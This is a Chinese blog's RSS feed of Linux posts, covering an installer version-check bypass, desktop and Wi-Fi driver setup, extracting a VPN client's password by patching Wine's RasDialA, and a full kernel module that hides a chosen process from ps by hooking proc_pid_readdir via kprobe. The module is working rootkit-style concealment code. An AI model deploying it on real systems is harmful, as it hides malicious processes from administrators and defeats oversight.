C++博客-糯米-随笔分类-Linuxhttp://www.cppblog.com/varg-vikernes/category/16060.htmlzh-cnMon, 29 Aug 2011 05:08:47 GMTMon, 29 Aug 2011 05:08:47 GMT60去除dvsdk安装的Ubuntu版本限制http://www.cppblog.com/varg-vikernes/archive/2011/08/27/154470.html糯米糯米Sat, 27 Aug 2011 01:43:00 GMThttp://www.cppblog.com/varg-vikernes/archive/2011/08/27/154470.htmlhttp://www.cppblog.com/varg-vikernes/comments/154470.htmlhttp://www.cppblog.com/varg-vikernes/archive/2011/08/27/154470.html#Feedback0http://www.cppblog.com/varg-vikernes/comments/commentRss/154470.htmlhttp://www.cppblog.com/varg-vikernes/services/trackbacks/154470.html
我要安装dvsdk的4.0版本。它的安装包是一个单个的可执行文件:


它提示,只能在Ubuntu 10.04上面安装。


我自己的Ubuntu是11.04,文件系统resierfs,如果resize的话貌似会清空。当然也不愿意再装一个旧版的。
所以琢磨着怎么把这个限制去掉。
首先我估计它是读了某个文件来获取的发行版本号。
所以先用 strace 命令看一下。加一个 -f 表示跟踪 fork 出来的子进程。
这个工具可以打印出程序所有的 syscall。因此 open,read,write,select 之类的调用都会被打印出来。



这时候出来很多结果,好比大海捞针一般,要仔细看哦。
突然发现一行显眼的:


“natty”是Ubuntu 11.04的代号,也就是说这个程序在某个地方读到了Ubuntu的版本号。
我对这些不了解,于是google了一下,发现是通过调用 lsb_release 这个工具来读到的。


然后又发现一个好消息,这个工具是 python 写的。
于是加了半句优雅的代码:


其中“lucid”是 Ubuntu 10.04 的版本号。如果 /tmp/lucidhack 这个文件存在,就输出 lucid 。
看看效果吧:



创建 /tmp/lucidhack,然后重新运行安装程序。
大功告成!




其实很多时候问题很简单,完全没有必要大动干戈。


糯米 2011-08-27 09:43 发表评论
]]>Linux内核通过inline hook实现隐藏进程http://www.cppblog.com/varg-vikernes/archive/2011/02/23/140519.html糯米糯米Wed, 23 Feb 2011 06:58:00 GMThttp://www.cppblog.com/varg-vikernes/archive/2011/02/23/140519.htmlhttp://www.cppblog.com/varg-vikernes/comments/140519.htmlhttp://www.cppblog.com/varg-vikernes/archive/2011/02/23/140519.html#Feedback0http://www.cppblog.com/varg-vikernes/comments/commentRss/140519.htmlhttp://www.cppblog.com/varg-vikernes/services/trackbacks/140519.html原理就是inline hook 那个 proc 文件系统,根目录下的 readdir 的函数。
替换掉第三个参数,filldir。
代码爆短,60来行。
Ubuntu 10.04 测试可用。

#include <linux/kernel.h>
#include <linux/kprobes.h>
#include <linux/module.h>
#include <linux/moduleparam.h>
#include <linux/fs.h>

int register_kprobe(struct kprobe *kp);

static struct kprobe kp = {
    .symbol_name    = "proc_pid_readdir",
};

static filldir_t old_filldir;
static int pid;

module_param(pid, int0744);

static int filldir(void * __buf, const char * name, int namlen, loff_t offset,
           u64 ino, unsigned int d_type)
{
    int p;
    sscanf(name, "%d"&p);
    if (p == pid)
        return 0;
    return old_filldir(__buf, name, namlen, offset, ino, d_type);
}


/* kprobe pre_handler: called just before the probed instruction is executed */
static int handler_pre(struct kprobe *pr, struct pt_regs *regs)
{
    old_filldir = (filldir_t)regs->cx;
    regs->cx = (typeof(regs->cx))filldir;
    return 0;
}

static int __init k_init(void)
{
    int ret;

    kp.pre_handler = handler_pre;

    ret = register_kprobe(&kp);
    if (ret < 0{
        printk(KERN_INFO "register_kprobe failed, returned %d\n", ret);
        return ret;
    }
    printk(KERN_INFO "Planted kprobe at %p; pid %d\n", kp.addr, pid);

    return 0;
}

static void __exit k_exit(void)
{
    unregister_kprobe(&kp);
    printk(KERN_INFO "kprobe at %p unregistered\n", kp.addr);
}

module_init(k_init);
module_exit(k_exit);
MODULE_LICENSE("GPL");



sleep 1000 &
pid=`jobs -p`
echo 'before hide'
ps aux | grep $pid
insmod k.ko pid=$pid
echo 'after hide'
ps aux | grep $pid
rmmod k.ko
echo 'after unhide'
ps aux | grep $pid



糯米 2011-02-23 14:58 发表评论
]]>在Linux下使用BridgeWan代理http://www.cppblog.com/varg-vikernes/archive/2011/01/07/138131.html糯米糯米Fri, 07 Jan 2011 11:56:00 GMThttp://www.cppblog.com/varg-vikernes/archive/2011/01/07/138131.htmlhttp://www.cppblog.com/varg-vikernes/comments/138131.htmlhttp://www.cppblog.com/varg-vikernes/archive/2011/01/07/138131.html#Feedback0http://www.cppblog.com/varg-vikernes/comments/commentRss/138131.htmlhttp://www.cppblog.com/varg-vikernes/services/trackbacks/138131.html
首先,在Windows下抓包得到了一点信息。
发现用的是PPTP协议。CHAP验证方式。用户名是一样的。
但是在linux试一下直接连接,发现密码错误,也就是说密码改了。
在PPTP连接之前,它还发起了几个HTTP的请求。
除了获取程序界面上显示的网页之外,还有可能是请求了一些特别的东西,用来生成密码。
总之它密码改了就对了。

试图用Wine运行,结果报了几个错,就是说有的函数没实现。
注意到了RasDial这个函数,Wine没有实现。
去msdn查了一下,是PPTP拨号相关的函数,而且它的参数里,包含了密码!

这下好办!首先把Wine的源码下载下来,然后查找到RasDialA函数。
加一句话把密码打印出来。编译运行。

本来想着它动态生成密码,每次都不一样。
但是发现每次都一样的。。这样就更省事拉!

我用的是kvpnc这个客户端,配置蛮方便的。
注意:验证方式选择MSCHAP,取消MPPE。



糯米 2011-01-07 19:56 发表评论
]]>ubuntu下安装精简而实用的桌面环境http://www.cppblog.com/varg-vikernes/archive/2010/10/08/129075.html糯米糯米Fri, 08 Oct 2010 12:49:00 GMThttp://www.cppblog.com/varg-vikernes/archive/2010/10/08/129075.htmlhttp://www.cppblog.com/varg-vikernes/comments/129075.htmlhttp://www.cppblog.com/varg-vikernes/archive/2010/10/08/129075.html#Feedback0http://www.cppblog.com/varg-vikernes/comments/commentRss/129075.htmlhttp://www.cppblog.com/varg-vikernes/services/trackbacks/129075.htmlapt-get install scim-chinese
apt-get install roxterm
cat >~/.xinitrc <<E
roxterm &
scim &
xfwm4
E
xinit


糯米 2010-10-08 20:49 发表评论
]]>dell m1330 xps笔记本linux下的无线网卡驱动的安装http://www.cppblog.com/varg-vikernes/archive/2010/10/08/129073.html糯米糯米Fri, 08 Oct 2010 12:43:00 GMThttp://www.cppblog.com/varg-vikernes/archive/2010/10/08/129073.htmlhttp://www.cppblog.com/varg-vikernes/comments/129073.htmlhttp://www.cppblog.com/varg-vikernes/archive/2010/10/08/129073.html#Feedback0http://www.cppblog.com/varg-vikernes/comments/commentRss/129073.htmlhttp://www.cppblog.com/varg-vikernes/services/trackbacks/129073.htmlmount /dev/cdrom /media/cdrom
cd /tmp
find /media/cdrom -name '*.exe' | while read i; do unzip -ao $i; done
cd DRIVER_US
ndiswrapper -i bcmwl5.inf
rmmod b43
rmmod ssb
modprobe ndiswrapper
iwconfg .....

糯米 2010-10-08 20:43 发表评论
]]>